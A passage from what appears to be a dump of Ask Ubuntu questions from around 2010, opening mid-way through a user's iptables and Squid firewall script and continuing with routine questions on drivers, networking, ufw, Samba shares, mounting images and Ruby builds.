-- dport 80 -j dnat -- to 192.168.10.1:8888 # $ iptables -t nat -a prerouting -i $ extif -p tcp -- dport 80 -j redirect -- to-port 8888 # echo `` diverting port 80 traffic through squid . '' # $ iptables -t nat -a prerouting -i $ intif -p tcp -- dport 80 -j redirect -- to-port 8888 # note the three lines below allow access for the vpn connection ... ry . $ iptables -a input -i $ extif -p tcp -- dport 1723 -j accept $ iptables -a input -i ppp+ -j accept $ iptables -a forward -i ppp+ -o $ intif -j accept $ iptables -a forward -i $ intif -o ppp+ -j accept $ iptables -a output -o ppp+ -j accept # icmp for vpn $ iptables -a input -i ppp+ -p icmp -j accept $ iptables -a output -o ppp+ -p icmp -j accept # dns for vpn $ iptables -a input -i ppp+ -p tcp -- dport 0:65535 -- sport 53 -j accept $ iptables -a output -o ppp+ -p tcp -- sport 0:65535 -- dport 53 -j accept $ iptables -a input -i ppp+ -p udp -- dport 0:65535 -- sport 53 -j accept $ iptables -a output -o ppp+ -p udp -- sport 0:65535 -- dport 53 -j accept # forward vpn -- - > internet $ iptables -a forward -i ppp+ -o $ extif -p all -j accept $ iptables -a forward -i $ extif -o ppp+ -p all -j accept # $ iptables -a forward -j log -- log-level 7 -- log-prefix `` dropped by firewall : `` # $ iptables -a input -j log -- log-level 7 -- log-prefix `` dropped by firewall : `` # $ iptables -a output -j log -- log-level 7 -- log-prefix `` dropped by firewall : `` } flush ( ) { echo `` flushing rules ... . '' $ iptables -p forward accept $ iptables -f input $ iptables -p input accept } case `` $ 1 '' in start|restart ) flush load ; ; stop ) flush ; ; * ) echo `` usage : start|stop|restart . '' ; ; esac if i uncomment the squid prerouting lines the internet stops working . i am not sure what i have missed . do you think it could be a squid config thing ?
4011	ati proprietary driver performance ?	i 'm about to ( at least , want to.. ) buy a laptop with an ati radeon hd 4250 , and i have n't a good opinion on ati 's drivers . how is the actual performance of the open/proprietary driver ( currently i have nvidia , and i 'm very satisfied ) ? the intended use for the laptop is : watching videos , programming in java/php/maybe qt ... but , i like to know if compiz runs well . yes , i 'm a hardcore ( ? ) programmer that uses compiz . : p someone has this gpu ? experiences ? thoughts ? thanks ! : d
4014	how do i renew my dhcp lease ?	short of rebooting , how can i release and renew my dhcp lease ? it would be useful to know a gui and terminal method . i 'd especially like to know if there is a means to do this without requiring admin privileges .
4019	which bluetooth headphones work best ?	while i can see there is a lot of info available on setting up the headphones , but before i buy one i would like to know from the community if anyone tried setting up a bluetooth headphone on ubuntu lucid and which brands work well with ubuntu . not looking for anything expensive should be easy to configure repeatably
4026	need help booting the machine using the ubuntu 10.04 installer cd	i am trying to install ubuntu 10.04 on my machine which already has windows vista and fedora installed . i use grub to get the boot menu . the grub screen looks something like this ( has a fedora logo at the bottom ) the problem is that when i insert the cd and try to boot , it takes me directly to the grub menu for fedora/vista , nothing for ubuntu . so , i tried ubuntu 's cd boot helper to help me boot from the cd , and i get this error the bios says that i should press f2 for setup and f12 for boot options . i tried them . nothing happens except that it goes straight to the grub menu . what should i do ?
4028	drivers for the tenda twl541u wireless card ?	i have a tenda twl541u wireless usb card and i can not make it work with ubuntu 10.10 64 bits . i 've tried the windows xp drivers with ndiswrapper to no avail . in windows 7 i 've made it work with using the vista 64 driver . does anyone can help ? i 'm quite a noob in ubuntu .
4029	ubuntu installation wiped whole drive	an error occurred in the partitioning stage of an ubuntu 10.10 installation on my computer that caused me to restart and now all of my other partitions are gone . is there a way to recover these files ?
4033	which ubuntu version to use for my python web app ?	i 'm building a security-intensive ( stores credit card numbers , etc ) using python and django with uwsgi ( written in c ) , nginx , and pil ( python imaging library ) . i 'm trying to work my way up in the ubuntu world to be less of an ignoramus , so i just bought the official ubuntu server book . just reading this book is n't going to make me even an amateur level server admin compared to the peeps on here though , so i have to ask : which flavor of ubuntu would be an optimal route to go down with the above requirements , and more importantly , why ? i 've read good things about hardy , but i know not the reasons why it 's `` good '' .
4037	automatically reconnect wireless connection	the wireless connection in my house unfortunately often disappears , requiring a wireless router reboot . making this worse is that my ubuntu media pc , does not automatically reconnect to the wireless network when it 's been gone , and then comes up about a minute later . the network in question is setup as `` connect automatically '' in the network settings . if i manually select my wireless network , using the wireless icon in the topright of my screen , everything works fine , until the next time that wireless goes down . i 'm looking for a way so i do n't have to remember to do this manually all the time .
4041	enable remote desktop for the whole pc	how can i set up my pc the remote desktop is enabled from the moment it is booted , regardless of who is logged on ? currently , i have to open vino-preferences so i can access my pc from another computer . but if my wife then logs on , i ca n't see either my account or my wife 's . can it be set up as a service , so it is enabled when i turn on the computer ?
4043	readline not compiled by default - causing `require ' : no such file to load -- readline	when trying to install ruby 1.9.2 on ubuntu 10.04 ( 64-bit ) , i get the following error after performing the following steps : install dependencies ./configure to create make file make make install make clean ruby -ropenssl -rzlib -rreadline -e `` puts : hello '' ( this should output 'hello ' if all is well ) . , instead of outputting hello , i get this : require : no such file to load -- readline` after searching online , i find this solution : blockquote if youâve compiled ruby from source , you might get this error when executing script/console : /usr/local/lib/ruby/1.8/irb/completion.rb:10 : in `require ' : no such file to load -- readline ( loaderror ) one way of fixing this is to compile readline , which is distributed along with the ruby source : cd /opt/src/ruby-1.8.5-p2/ext/readline ruby extconf.rb make sudo make install this totally worked for me . my question is , why did n't ruby compile this to begin with ? did i forget some sort of config option ?
4048	how to setup bluetooth tethering with iphone ?	how do i use my iphone as a wireless internet source using bluetooth ?
4055	audio output device , fast switch ?	depending on the situation , i use either my speakers or my headset for audio output . given that my headset is an usb headset it behaves as its own audio device . currently i switch between audio output devices by clicking on the speaker icon in the upper right tray , where i select sound settings , goes to the output tab and there choses the device i want . what i wonder is if there might be some easier/quicker way to switch back and forth to my usb headset ? perhaps a dedicated tray icon , a key mapping , or so ? i am running ubuntu 10.04 , with the default gnome desktop .
4062	locale problem when running xterm in ubuntu 10.04	i am new to linux . when i run a borealis application , the 'locale not supported by xlib ' error comes up : ... xterm -t borealis @ 127.0.0.1:15000 -geometry 80x10+20+600 -e ../..//src/src/borealis -d 127.0.0.1:15000 one processing node ( borealis ) started . warning : locale not supported by xlib , locale set to c starting mytest mytest started nghiatran @ nghiatran-desktop : ~/borealis/test/simple $ xterm -t mytest -geometry 200x30+200+30 -e .//mytest warning : locale not supported by xlib , locale set to c there should be two windows opening . however i only see them appear and quickly quit . using locale command i got this result : lang=en_sg.utf8 lc_ctype= '' en_sg.utf8 '' lc_numeric= '' en_sg.utf8 '' lc_time= '' en_sg.utf8 '' lc_collate= '' en_sg.utf8 '' lc_monetary= '' en_sg.utf8 '' lc_messages= '' en_sg.utf8 '' lc_paper= '' en_sg.utf8 '' lc_name= '' en_sg.utf8 '' lc_address= '' en_sg.utf8 '' lc_telephone= '' en_sg.utf8 '' lc_measurement= '' en_sg.utf8 '' lc_identification= '' en_sg.utf8 '' lc_all= does anybody know how to solve this problem . i really appreciate your help .
4066	how do i set ufw to allow internal network connections ?	i 'm configuring an ubuntu server for my home network to handle nat and firewall . i 've configured dnsmasq and verified that it 's working correctly . i want all connections from my internal network to be allowed . however , once i enable ufw , the connections are blocked . i have tried : sudo ufw allow in on eth1 and : sudo ufw allow from 192.168.0.0/24 but any solution i try results in messages such as these in syslog : [ ufw block ] in=eth1 out=eth0 src=192.168.0.10 dst=91.189.94.156 len=60 tos=0x00 prec=0x00 ttl=63 id=16240 df proto=tcp spt=37444 dpt=80 window=5840 res=0x00 syn urgp=0 am i understanding the rules incorrectly , or is the problem elsewhere ?
4068	can i see more details of an aptitude dist-upgrade ?	when i type aptitude dist-upgrade i get for example : reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done the following new packages will be installed : bc { a } linux-image-2.6.32-24-virtual linux-image-2.6.32-308-ec2 the following packages will be upgraded : apt apt-transport-https apt-utils base-files bijk-node binutils cloud-init grub-common grub-pc icedtea-6-jre-cacao ifupdown landscape-client landscape-common libfreetype6 libfreetype6-dev libgssapi-krb5-2 libk5crypto3 libkrb5-3 libkrb5support0 libldap-2.4-2 libmysqlclient16 libpcsclite1 libsmbclient libudev0 libusb-0.1-4 libwbclient0 libwww-perl lintian linux-ec2 linux-image-ec2 linux-image-virtual linux-libc-dev linux-virtual mountall mysql-client-5.1 mysql-client-core-5.1 mysql-common mysql-server mysql-server-5.1 mysql-server-core-5.1 openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib python-apt python-lazr.restfulclient sudo tzdata tzdata-java udev update-manager-core upstart ureadahead w3m wget 54 packages upgraded , 3 newly installed , 0 to remove and 2 not upgraded . need to get 103mb of archives . after unpacking 89.4mb will be used . do you want to continue ? [ y/n/ ? ] what i would like to know is what changed in each upgrade candidate . is there a way i can see a list of all the changes in those packages ? i know i can do aptitude changelog mysql-server and i could probably grep & awk the candidates and pipe them to the changelog command , but executing that takes a long time . is there a better way to get a full changelog of a dist-upgrade ?
4069	why does applying system-wide network proxy settings affect only the superuser ( root ) ?	i recently solved my problem how to check if network proxy is really applied ? now i can use sudo apt-get install application-name easily - but the problem is that the normal user ( not the superuser ) can not see the proxy . for example , these commands have different outputs : wget http : //whatismyip.com and sudo wget http : //whatismyip.com it shows that the first command does not use the proxy while the second clearly says : connecting to localhost|127.0.0.1|:8080 ... connected . the strange thing is that when i check http : //whatismyip.com with firefox , it shows the proxy ip not my real ip , which means that firefox sees the proxy . why ca n't wget see the proxy ?
4072	how can i find duplicate photos ?	what can i use to find duplicate photos , including photos that have been resized ?
4075	why is ubuntu sometimes ugly when i log in ?	sometimes , maybe once every week or two , things look like this when i log in : when this happens , i log out and then back in and things look normal again : this happens in ubuntu 10.04 on my thinkpad x60 and my custom built desktop . it has only ever happened on the first log in after booting the computer . what could cause something so intermittent ?
4078	signed emails from kmail end up with invalid signature at destination	i 've been signing emails to a mailing list with gpg , but they always seem to come through with an invalid signature . i 'm using openpgp/mime format . the only difference i can see is that content-type : text/plain ; charset= '' windows-1250 '' content-transfer-encoding : quoted-printable changes to content-type : text/plain ; charset= '' windows-1250 '' content-transfer-encoding : quoted-printable would this affect the signature ? i realise that a single character difference makes the signature invalid . i do n't see any options in kmail that would affect the layout of those lines .
4080	how to configure domain name on school network	i 'm trying to set up my server ( running ubuntu server 8.04 ) on my university network so that i can access it from anywhere on campus . last year i had it plugged into my router and set my router 's domain like network.myschool.edu and hostname to dlh . this allowed me to access the router using dlh.network.myschool.edu , and i just used port-forwarding to access the server . now i 'm just plugging the server in sans router and i 'm trying to emulate the same setup . i have avahi installed and i 've tried setting my /etc/hostname to both dlh and dlh.network.myschool.edu . it does n't seem to be working though when i try to ping from another computer . honestly though , i do n't understand the whole domain/hostname thing very well and i 'm not sure how this is done properly .
4081	stuck in logon loop	here 's the deal . i set up a computer with ubuntu 10.04 for my grandmother . everything worked fine . i connected it to the internet at her house today . after rebooting the computer i found that the computer would kick you back to the logon screen if you attempted to logon to her account . it worked fine logging on to my admin account , and also in gnome 's safe mode . i thought it had resolved itself , but turns out it had n't , and now i do n't have physical access to the computer , plus the remote connection i 'd hoped to use only works intermittently . i need some suggestions for troubleshooting for when i 'm at her house at some point next week . ask for any more details , but i 'm afraid i wo n't be able to provide many more until i 've checked it out in person , since she is basically unable to use a computer beyond web browsing . thanks in advance !
4086	how do i create a persistent usb 2.0 thumb drive install of ubuntu in a windows environment ?	i would like to turn this 32gb usb 2.0 flash drive into a 32 gb partition with ubuntu installed on it which i can boot and read/write persist as any normal hard drive install would be expected to do . the trick is that i do n't want to have to install ubuntu to create this thing . can i create it from a live boot of a cd ? if so , i 'll take the challenge to the next level by saying i 'd like to avoid that as well . there has to be a way to create it from windows to usb right ? ( i have iso of 10.4 )
4087	ubuntu server auto download torrents	i am looking for a torrent program that i will download torrents place in a certain folder . i have a similar program for nzbs called hellanzb . i would like the best recommended software for this . thanks .
4092	how to run a desktop graphical application just once under sudo ?	for example , i 'm trying to run archive manager from ubuntu desktop ( 10.04 ) under sudo otherwise it wo n't let me extract a software development kit into /usr/local update : i do n't want sudo to be a permanent change to launching the application ; only to run it under sudo when i choose , until it 's quit .
4095	how to mount encrypted windows partition in ubuntu ?	i have asked this question here and i want more replies please how do i mount a safeboot encrypted windows partition on ubuntu ( 10.04 ) ? i had a harddisk with safeboot encrypted windows partition . i resized the partition and then installed ubuntu on the free space . now my windows does n't load i have tried mount -t ntfs /dev/sda1 /mnt/windows tried changing fstab tried changing grub.cfg i also installed ntfs config tool but it does n't detect the windows partition but sudo fdisk -l show me the windows partition on /dev/sda1 with ntfs if i ca n't mount the windows partition now , can you tell me how do i dual boot ? when i switch on my laptop , it directly boots into ubuntu without any grub menu . how do i fix this issue to show a grub menu and dual boot into both windows & ubuntu ?
4096	what free remote desktop ( server ) solutions are there ?	i know ubuntu comes with a `` remote desktop '' option that appears to be a straightforward vnc server , and i 'm trying to understand the alternatives . here are the possibilities i 've heard about so far : vnc vnc + ssh tunnelling nx server , free edition freenx neatx x2go x11 forwarding over ssh xrdp i 'm coming at this from a windows user 's perspective : to the best of my experience , rdp ( aka terminal services ) is a reasonably secure ( barring mitm/server spoofing ) , efficient desktop sharing protocol with well-supported clients , that can be exposed to the internet when necessary without major fears of intrusion . to the best of my knowledge straight vnc is none of those things , which is where i get confused - why would n't a better desktop sharing technology be developed or used in the open-source world ? i know vnc can be wrapped with ssh , but that seems beyond the reach of a casual user . x11 forwarding over ssh may be more or less efficient , i have no idea , but is definitely even more complicated , and does n't ( as far as i know ) give you access to already-running stuff ( no desktop sharing as such , just remote application running ) . so , i 'd like any feedback/preferences amongst these or any other `` free '' desktop sharing options , using these criteria and/or any others : security ( esp . for access across internet ) efficiency ( bandwidth usage , responsiveness , etc ) free-ness , as in speech ( not sure where rdp or freenx lie for this ) free-ness , as in beer ( are there any commercial solutions with usable dependable free offerings ? ) ease of use ( server and client side ) cross-os client availability cross-os server availability support for independent sessions and shared ( and/or `` console '' ) sessions ongoing support/maintenance/development thanks !
4098	delete ubuntu to free up space for computer restart properly	i copied photos onto my notebook hard drive and got a warning of limited hard drive space ... i continued to copy photos onto my hard dirve . i got a message that the space limit was reached an no more photos could be copied onto the hard drive . i restarted my notebook and the initial ubuntu page could not load due to lack of memory . i tried to start-up in safe mode , buit to no avail . i guess that will mean that i uninstall ubuntu completely and reinstall it again . i have all important stuff backed up in case i need to unistall ubuntu . my screen is black at the moment with my computer name prompting for the password . when i type in the password i get a message '' the configuration defaults for gnome power manager have not been installed correctly . see administrator . '' i tried crtl-alt-f1 as suggested . i put in my laptop login and password ... message now is : hylton @ hylton : ~ $ where do i go from here ?
4103	visual corruption affecting several panel applets	this happens occasionally , and i never know how to fix it without deleting the panel and adding a new one . any help would be appreciated .
4109	how do i increase the resize margin on windows ?	it takes me about 5 tries to resize a window on my computer . is there a way to increase the resize margin on the edge of windows ?
4113	which time tracker application do you recommend ?	i have to do three or four jobs a day , and each has several parts . i want a time tracker tool to help me know how much time i 've spent on each part and each job overall . i 've found some like gnotime and hamster . what application do you recommend for such a case ?
4118	setup a local testing smtp server	i need to set up an smtp server , really the goal is so that this server has no communication with the outside world , i would create the server , and would want a mail client looking at messages the server generates ( brownie points if all messages go into the same inbox ) . this is basically to test out my mail system and see how it looks on different clients , while at the same time not actually sending emails to people . any advice , any known systems that do this ?
4119	upgrade from kubuntu 9.10 to ubuntu 10.04	i 'm planning to switch from kde to gnome ( kubuntu to ubuntu ) and from 9 to 10 in one step - do you have any hints what would be the least painful way to do this ?
4120	view pdf with `` fit to page size '' by default	whenever i open a pdf file in ubuntu , the document viewer shows that file zoomed so that the page width fits to the screen width ( and the lower part of the document is not visible ) . due to the large monitor i would really prefer to have it show the full document with a smaller zoom instead ( i think that might be called `` fit to page size '' in english ) . i found no preference in the document viewer to change its startup behaviour . is there any preference for that which i missed ? are there alternative pdf viewers which can be configured to fulfill my needs or which have this setting as default ? thanks for any suggestion .
4124	how to log on to a ubuntu server ; from windows with a plain gui	i was hoping to setup and maybe browse the internet from a ubuntu server i setup at home . seeing that i have installed , ubuntu server , i was hoping if there is software i can install to get a browser going on it from my windows pc . is this what vnc4server is for ? any links or suggestion helping me on this task , would be appreciated . please and thank you .
4131	how can i put old ubuntu cds to good use ?	i have a fair number of older ubuntu cds sitting around for releases that are not supported anymore . they have beautiful pressed labels and sleeves that i would hate to just throw away . what can i do with them ?
4134	custom php.ini for virtualhost	is there a way to use a different php.ini file foreach virtualhost in apache ? i know that there are the php_admin_values < location /stat/ > php_admin_value safe_mode off < /location > but i want to specify a full php.ini file for a virtualhost .
4135	group share permisssions to windows clients ?	on our home network we have ubuntu 10.4 amd64 desktop functioning as a file server and a couple of winxp laptops . ubuntu is not set up as a domain server , user names and passwords are synched , manually , across all machines . what is the proper way to set up a shared space for the windows clients so that members of group parents , and only parents , both have read and write access to it 's contents ? i thought i had this done , but when dad creates or writes a file in \server\share-parents\ mom 's write access to same is revoked , vice versa . this creates all sorts of havoc when said file is the family expense spreadsheet and the home renos are this close to blowing the year 's budget and credit card payment is due ... need i add that last years kludge of recursively chown'ing to : parents and chmod'ing g+w no longer keeps the bacon out of the fire ? the smb.conf shared section : [ global ] # other stuff edited out security = user [ share-parents ] comment = parents shared files available = yes browseable = yes public = yes valid users = mom , dad writable = yes path=/home/shared follow symlinks = yes
4139	proxy to automatically save specific urls	i am looking for a network proxy that would do the following : if a requested url matches a certain pattern ( regular expressions would be ideal ) save the transfer to a specified folder . i 'm not sure if i can achieve that with squid ( that i already have running ) , but i 'm open to using other tools . thanks !
4140	can i mount an iso without administrative privileges ?	can i mount an iso in ubuntu 10.04 without requiring the use of sudo ? this is all i know how to do : sudo mount -o loop -t iso9660 image.iso /media/iso a few answers mentioned using something called `` archive mounter '' . i 've never noticed this before , but i do see it listed in the `` open with '' list when right-clicking iso files . where can i find documentation on how to use it ?
4147	connecting ubuntu with olympus vn-960pc	i have followed the steps here : http : //www.piotrkrzyzek.com/olympus-vn-480pc-working-in-linux-odvr/ and here : http : //ubuntuforums.org/showthread.php ? t=207104 & page=2 i have download the i386 version . if i do : $ sudo odvr i get the device listed : model : vn-960pc great . if i try to run a command however , i get : failed to open olympus device : could n't claim interface wondering if someone else have had this issue or similar , and if not , what would you do to try to solve it ?
4153	gwibber notifications are not shown	since the microblogging plugin for gnome.do fails to work in combination with a proxy , i switched to gwibber . gwibber works fine , but although 'display notifications ' is checked in my preferences , notifications are not shown . all other notifications ( like sound , pidgin ) work fine . i am using lucid with all the latest updates and gwibber version : 2.30.2
4156	ubuntu server `` fakeraid '' raid5 installation	i 'm trying to install ubuntu 10.04 server edition on a computer with a raid5 array . the array seems functional from the bios standpoint . the problem arises in the installation when it comes to partitioning the drives . the ubuntu installer only offers me to `` configure iscsi volumes '' . there are no options offered . it then offers to `` log into iscsi targets '' and asks for an ip and port # . i 've tried entering the loopback ip , but it says that no iscsi targets exist there . dont know where to go from here . i havent found any documentation on the subject anywhere on the ubuntu.com and ubuntuforums.org sites ... any ideas ? update 1 : i 'm running a real hardware raid using nvidia ck804 controllers ( 2 of them , 2 hdds each )
4158	how do i mount .cue file ?	i have a cd image that is not a .iso but a .cue . i can not mount it . i use ubuntu 10.10 64 bits , and i 've tried a lot of programs . furiosmout just says it is not a image file , and it just did n't work . i found a program ( acetone ) that can convert .cue in .iso , but it says i need other packages ( that i could not come to ) . i was looking for an easy way . any help ?
4163	wubildr.mbr missing or corrupt	i 'm dual booting w7 and ubuntu ( installed from wubi ) . i 've had it up and running a few times but today i 'm getting a message from windows boot manager when i select ubuntu that wubildr.mbr is missing or corrupt . any help would be greatly appreciated .
4164	ca n't get firefox to start	my firefox has had all sorts of trauma . the addition of the firefox-daily ppa and also version 4 from the same ppa . i since removed this and now have version 3.6.9+build1+nobinonly-0ubuntu0.10.04.1 removal of firefox profile folder and general playing with different profiles but now i ca n't get it to do anything , not even startup . all the following produce nothing : $ firefox $ firefox -safe-mode $ firefox -private $ firefox -profilemanager strangely ( or not ) firefox -- help and firefox -version behave as anticipated . anyone got any suggestions as to how to resurrect my firefox ?
4167	wine turned off my audio !	i opened wine configuration page for the first time while music was playing in the background . just when i opened the audio tab , the sound stopped working and wine alerted me about my audio driver . now my pc has no sound ! what should i do to get back audio ? i do n't need audio in wine .
4172	how to set up an e-mail whitelist	my home network is set up as follows : pcs - > wired network -- -| | -- - server -- - internet pcs - > wireless network -- -| the server runs the fetchmail , postfix and dovecot daemons under ubuntu to retrive e-mail from the isp and store it on the server . e-mail is accessed from any of the pcs on the wired or wireless networks via an imap interface hosted on the server . this all works great . i 'm about to let my young children use e-mail for themselves . but before i let them loose on the world , i wanted the server to implement a whitelist for e-mails that are retrieved from the isp and sent to their mailbox . ideally , the incoming senders full address should be listed in the whitelist for it to be forwarded to the mailbox . anything that is n't in the whiltelist should be forwarded to a different mailbox which i can then look through and update the whitelist as appropriate . how do i set up the various daemons to do this ?
4175	setting up a new machine with 2 hd	here 's the partitioning scheme i set up on a machine with 2 80gb drives : sda 1 ) root = 15g 2 ) swap = 4g 3 ) home = 60g ok ? or is there a better scenario ? then the partitioner shows the second drive : sdb which is 80g and i 'm not sure which mount point i should set for the second drive , so i just labeled it as an unused partition for now . should it be set to /home in order to use the space ? also , i 'll replace this one with a bigger drive eventually . with that in mind , what is the best way to deal with the second drive ? thanks .
4176	how to reset default window effects	i was dumb and removed all the window effects under the compiz manager animation settings and i was wondering how to reset the window effects to what they were by default ( using gnome ) . update 1 i think there 's been some confusion regarding what , exactly , is being asked . i 'm not asking how to switch effect levels . i 'm asking how to bring back the default list of visual effects that are enabled once you choose `` custom '' in the effects preferences window . i removd all of the effects under the `` open window '' tab in `` animations '' and i 'd like to know how to get them back .
4181	how to resolve ruby on rails imagemagick conflict ?	i am trying to install refinerycms , a ruby on rails cms on ubuntu 10.04 lts . i run rails server and i get the following exception : carcher @ carcher-laptop : ~/code/tgc $ rails server = > booting webrick = > rails 3.0.0 application starting in development on http : //0.0.0.0:3000 = > call with -d to detach = > ctrl-c to shutdown server exiting /usr/lib/ruby/gems/1.8/gems/rmagick-2.12.2/lib/rmagick2.so : this installation of rmagick was configured with imagemagick 6.6.4 but imagemagick 6.5.7-8 is in use . ( runtimeerror ) from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:239 : in `require' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:225 : in `load_dependency' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:591 : in `new_constants_in' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:225 : in `load_dependency' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:239 : in `require' from /usr/lib/ruby/gems/1.8/gems/rmagick-2.12.2/lib/rmagick.rb:11 from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:239 : in `require' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:239 : in `require' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:225 : in `load_dependency' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:591 : in `new_constants_in' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:225 : in `load_dependency' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:239 : in `require' from /usr/lib/ruby/gems/1.8/gems/dragonfly-0.7.6/lib/dragonfly/analysis/r_magick_analyser.rb:1 from /usr/lib/ruby/gems/1.8/gems/dragonfly-0.7.6/lib/dragonfly/config/r_magick.rb:15 : in `apply_configuration' from /usr/lib/ruby/gems/1.8/gems/dragonfly-0.7.6/lib/dragonfly/configurable.rb:33 : in `configure' from /usr/lib/ruby/gems/1.8/gems/dragonfly-0.7.6/lib/dragonfly/config/r_magick.rb:14 : in `apply_configuration' from /usr/lib/ruby/gems/1.8/gems/dragonfly-0.7.6/lib/dragonfly/configurable.rb:39 : in `configure_with' from /usr/lib/ruby/gems/1.8/gems/refinerycms-0.9.8.2/vendor/refinerycms/images/lib/images.rb:10 from /usr/lib/ruby/gems/1.8/gems/railties-3.0.0/lib/rails/initializable.rb:25 : in `instance_exec' from /usr/lib/ruby/gems/1.8/gems/railties-3.0.0/lib/rails/initializable.rb:25 : in `run' from /usr/lib/ruby/gems/1.8/gems/railties-3.0.0/lib/rails/initializable.rb:50 : in `run_initializers' from /usr/lib/ruby/gems/1.8/gems/railties-3.0.0/lib/rails/initializable.rb:49 : in `each' from /usr/lib/ruby/gems/1.8/gems/railties-3.0.0/lib/rails/initializable.rb:49 : in `run_initializers' from /usr/lib/ruby/gems/1.8/gems/railties-3.0.0/lib/rails/application.rb:134 : in `initialize ! ' from /usr/lib/ruby/gems/1.8/gems/railties-3.0.0/lib/rails/application.rb:77 : in `send' from /usr/lib/ruby/gems/1.8/gems/railties-3.0.0/lib/rails/application.rb:77 : in `method_missing' from /home/carcher/code/tgc/config/environment.rb:5 from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:239 : in `require' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:239 : in `require' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:225 : in `load_dependency' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:591 : in `new_constants_in' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:225 : in `load_dependency' from /usr/lib/ruby/gems/1.8/gems/activesupport-3.0.0/lib/active_support/dependencies.rb:239 : in `require' from /home/carcher/code/tgc/config.ru:3 from /usr/lib/ruby/gems/1.8/gems/rack-1.2.1/lib/rack/builder.rb:46 : in `instance_eval' from /usr/lib/ruby/gems/1.8/gems/rack-1.2.1/lib/rack/builder.rb:46 : in `initialize' from /home/carcher/code/tgc/config.ru:1 : in `new' from /home/carcher/code/tgc/config.ru:1 carcher @ carcher-laptop : ~/code/tgc $ i built and installed imagemagick 6.6.4 from source following the instructions here and before i did that i removed the imagemagick tools that were pre-installed in ubuntu , to avoid any conflicts . but still i seem to have this version 6.5.7 around . i guess my question is how do i remove/disable imagemagick 6.5.7-8 ?
4190	increase space for /root in ubuntu wubi	i have ubuntu 10.04 installed inside windows 7 through wubi . i need to increase the size of /root or root.disk . how can i do this ? wubi-add-virtual-disk does not work since root.disk is already present .
4191	what 's a good cctv app to start out on ? zoneminder or motion ?	i 've been asked to put together a cctv solution for a small business . ubuntu is my choice os , and i 'm looking at zoneminder or motion as the app of choice . any experience with one or the other ? also , any recommendations on cameras ? i 'm thinking we 'll try a stock usb webcam to begin with , but i have no experience in this area . the store area is about 25 feet long , 10 feet wide , with large west-facing windows .
4194	when i resume from suspension - the screen is blank	i use ubuntu 10.04 in hp pavilion dv4 2165 dx . after putting my computer in suspend , when i open the scree comes very low brightness ; even i can not see anything there , so eventually i press the power button to shut down and start it again . it happens every time . how to solve this problem . thanks
4195	panel applets are jumbled on login	sometimes when i login , i see that the applets ( notification area , evolution applet , session applet , indicator applet and workrave applet ) are jumbled up - they appear in some random order . only change i remember doing recently is to delay execution of startup applications as described here
4208	`` input/output error during read on /dev/sda '' during installation	at the moment my laptop does not have any os i am trying to install ubuntu 10.04 but after the initial installation steps it shows an `` input/output error during read on /dev/sda '' and the installation stops i have no idea what to do ? any help would be very useful . thank you
4210	seagate freeagent external hard drive keeps auto-mounting repeatedly	i plug in my seagate freeagent external hard drive and then plug the usb into my ubuntu 10.04 machine and , as expected , it mounts in /media . ok , this is great . i can access the files , etc . then , i edit my smb.conf file for this drive , so that i can share it and i add a line for sharing drives i do n't own . i share the drive and unmount it and then remount with sudo mount -t ntfs /dev/sdb1 /media/freeagent and it mounts fine . i can access the drive from a windows xp machine on my network . then , a short while later , it auto-mounts again , as /media/main-backup and then the mount point /media/freeagent no longer has the drive mounted and the files are not present . the files are in the newly mounted directory . i should note that the name of the drive is main-backup . i have edited my smb.conf file several ways to get this to work , including changing the name so it matches and the mount point directory where it should live . it is currently like so : [ main-backup ] comment = backup drive path = /media/main-backup guest ok = yes browseable = yes read only = no create mask = 0777 directory mask = 0777 but i have changed the line path = /media/main-backup to path = /media/freeagent with no success . then , some time later , it does this again , and another mount point is created /media/main-backup_ and then the previous mount does n't have any files but this new one does . each time , a window pops up with the new mount and the files on my external drive . if i leave this machine alone for an hour or so , it will repeat this process 5 or 6 times . i successfully mounted a drobo on my work network using a similar technique and it works great . not sure what i 'm doing wrong . any help is greatly appreciated . note - so i commented out the lines in the smb.conf and experimented with the drive auto-mounting on it 's own . still happens . i searched for a way to run off auto-mounting , but in 10.04 i ca n't find it . i tried preferences > file management > media and unchecked anything that seemed likely to cause this to no avail . towards the end of the auto-mounting experiment after commenting out the lines in smb.conf this error was generated : note 2 - the drive mounts ok , but then several minutes later , the network share becomes blank and the files are n't there . i go to the server computer and look at the drive , and this most recent time , the drive shifted from sdb1 to sdc1 . i remounted and it seemed to work again but then after a few minutes , the same behavior comes back ... empty share . this is odd behavior and i 'm not sure i 'm getting the root cause .
4214	fan wo n't turn on . how do i turn it on manually ?	i just got done installing ubuntu 10.04 on an acer laptop . the fan was working fine in vista but now with ubuntu the fan doens't turn on , so now it 's overheating after an hour or so of use . what 's wrong ? and if i have to , how do i turn on the fan manually ? p.s . not my laptop , it 's a friend 's daughter 's .
4215	how do i start dhcp3-server automatically on startup ?	i have dhcp3-server installed and configured , but i have to manually start the service every time the computer restarts . how can i make it start automatically on startup ? i do n't see a dhcp*.conf in /etc/init , and i have the correct interface specified in /etc/default/dhcp3-server
